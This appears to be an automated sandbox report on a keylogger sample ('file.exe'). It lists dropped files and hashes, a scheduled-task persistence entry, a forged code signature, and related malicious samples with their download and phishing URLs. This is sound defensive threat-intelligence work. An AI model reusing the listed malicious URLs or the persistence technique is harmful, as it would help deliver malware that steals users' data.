Execution Graph export aborted for target RegSvcs.exe, PID 3328 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
14:19:45	API Interceptor	1x Sleep call for process: file.exe modified
14:19:48	API Interceptor	15x Sleep call for process: powershell.exe modified
14:19:50	API Interceptor	247x Sleep call for process: RegSvcs.exe modified
14:19:51	API Interceptor	1x Sleep call for process: djqdPdQRO.exe modified
20:19:49	Task Scheduler	Run new task: djqdPdQRO path: C:\Users\user\AppData\Roaming\djqdPdQRO.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
158.101.44.242	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ZOYGRL1ePa.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Statement_3029_from_Cross_Traders_and_Logistics_ltd.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Overheaped237.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
checkip.dyndns.com	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	ZOYGRL1ePa.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08ok	Get hash	malicious	HTMLPhisher	Browse	104.18.142.119
	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	104.18.26.193
	https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html	Get hash	malicious	HTMLPhisher	Browse	172.66.0.235
	https://bit.ly/3W6tVJJ?BRK=80HiTWCpll	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63	Get hash	malicious	HTMLPhisher	Browse	104.26.9.117
	https://www.gazeta.ru/politics/news/2024/12/22/24684722.shtml	Get hash	malicious	HTMLPhisher	Browse	104.26.9.117
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	104.26.9.117
ORACLE-BMC-31898US	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Hilix.mips.elf	Get hash	malicious	Mirai	Browse	140.238.15.187
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	ZOYGRL1ePa.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	armv4l.elf	Get hash	malicious	Mirai	Browse	129.148.142.134
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	188.114.96.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	188.114.96.3
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.353332853270839
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
MD5:	A4AF0F36EC4E0C69DC0F860C891E8BBE
SHA1:	28DD81A1EDDF71CBCBF86DA986E047279EF097CD
SHA-256:	B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
SHA-512:	A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\djqdPdQRO.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\djqdPdQRO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.337066511654157
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
MD5:	55A2AF8F9FCA3AE99FBA235D3E16A53F
SHA1:	32F34219599006657BFF0B868257916A0C393AAA
SHA-256:	2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
SHA-512:	F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.337066511654157
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
MD5:	55A2AF8F9FCA3AE99FBA235D3E16A53F
SHA1:	32F34219599006657BFF0B868257916A0C393AAA
SHA-256:	2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
SHA-512:	F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380747059108785
Encrypted:	false
SSDEEP:	48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//YUyus:lGLHxvIIwLgZ2KRHWLOug8s
MD5:	808B507C97B860ECE465FF6F87A1F0E7
SHA1:	7D9AE072752936A4F8C7C885F8DD46DCA2594995
SHA-256:	92EB366E55CBDE0893653BCF8289CE093F908289400BF700DC9309F1A9B535B0
SHA-512:	253DFD1C0F915CBE825E312F4B0E1713E9FDF4AF5EB7F7F1FA73B89A6ACCFD032EB5F93B91808CFC0D36485DD29B5CD6A6D86064B771AEE801C5F15EACE6515D
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ayj2cqqi.dpv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jjjhpz4h.4wh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tz3ytraj.52s.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3nyenre.ers.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp8017.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1596
Entropy (8bit):	5.100519219662108
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLvxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT1v
MD5:	2447BEFAB0EE81748C0A60EA5A6CDBD0
SHA1:	88546B93DF8F081ADD4490AFDCDB569D2492242B
SHA-256:	2A70576CF4B8679A630B4A86B86175C073FD22716E6BA805A803CFC2F6C9A27E
SHA-512:	DDF96C4D146732ED5CBA0D935D448317628672A143F020C644341878B4B3640E6FC856651949B4ED40AD7D302DA91FE54237A597A4DAB2D216B2F7EDC1A72E18
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Local\Temp\tmp93EE.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\djqdPdQRO.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1596
Entropy (8bit):	5.100519219662108
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLvxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT1v
MD5:	2447BEFAB0EE81748C0A60EA5A6CDBD0
SHA1:	88546B93DF8F081ADD4490AFDCDB569D2492242B
SHA-256:	2A70576CF4B8679A630B4A86B86175C073FD22716E6BA805A803CFC2F6C9A27E
SHA-512:	DDF96C4D146732ED5CBA0D935D448317628672A143F020C644341878B4B3640E6FC856651949B4ED40AD7D302DA91FE54237A597A4DAB2D216B2F7EDC1A72E18
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Roaming\djqdPdQRO.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	606728
Entropy (8bit):	7.687430012044756
Encrypted:	false
SSDEEP:	12288:6BT255OHTDPk/2BwKw7vsr2L4gO2E2RlAS+W3QapwLDuCNTkR:m2XOPkOGBg2bt1r6a1qLDNG
MD5:	67B58449B42453F18E51B2BF786F9588
SHA1:	9259537C4CAA90A7B32C1370AF18D40B2F24D0C9
SHA-256:	4179ED7DA1BCADC909D949D5721807D0EB0098375BC443F22FB70609927D254E
SHA-512:	27E83950D69D143CB3416AB40706D086424E1339D185C4571ED46A234E2EFF9C0717D5A5DEFC45D5356AC56109B152010CF4AD536D66EA2D5FDD9A4CC8197453
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............!... ...@....@.. ....................................@.................................O!..O....@..\................6...`......(...p............................................ ............... ..H............text........ ...................... ..`.rsrc...\....@......................@..@.reloc.......`......................@..B.................!......H........m..l8...... ...X....d..........................................^..}.....(.......(......0..7.........{....o....r...p(......,..r...p(....&.+..rI..p(....&...0..7.........{....o....r...p(......,..r...p(....&.+..rI..p(....&...0..7.........{....o....r...p(......,..r...p(....&.+..rI..p(....&...0..+.........,..{.......+....,...{....o........(.....*..0..=.........s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....

C:\Users\user\AppData\Roaming\djqdPdQRO.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.687430012044756
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	606'728 bytes
MD5:	67b58449b42453f18e51b2bf786f9588
SHA1:	9259537c4caa90a7b32c1370af18d40b2f24d0c9
SHA256:	4179ed7da1bcadc909d949d5721807d0eb0098375bc443f22fb70609927d254e
SHA512:	27e83950d69d143cb3416ab40706d086424e1339d185c4571ed46a234e2eff9c0717d5a5defc45d5356ac56109b152010cf4ad536d66ea2d5fdd9a4cc8197453
SSDEEP:	12288:6BT255OHTDPk/2BwKw7vsr2L4gO2E2RlAS+W3QapwLDuCNTkR:m2XOPkOGBg2bt1r6a1qLDNG
TLSH:	03D4F1A85969E602C92197B00A31F2B417B86FEEF801D3172EEE7DEFB865F115C04653
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............!... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4921a2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xD9EFB718 [Mon Nov 12 01:10:48 2085 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add dword ptr [eax], eax
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
or byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add dword ptr [eax], eax
add byte ptr [eax], al
add al, byte ptr [eax]
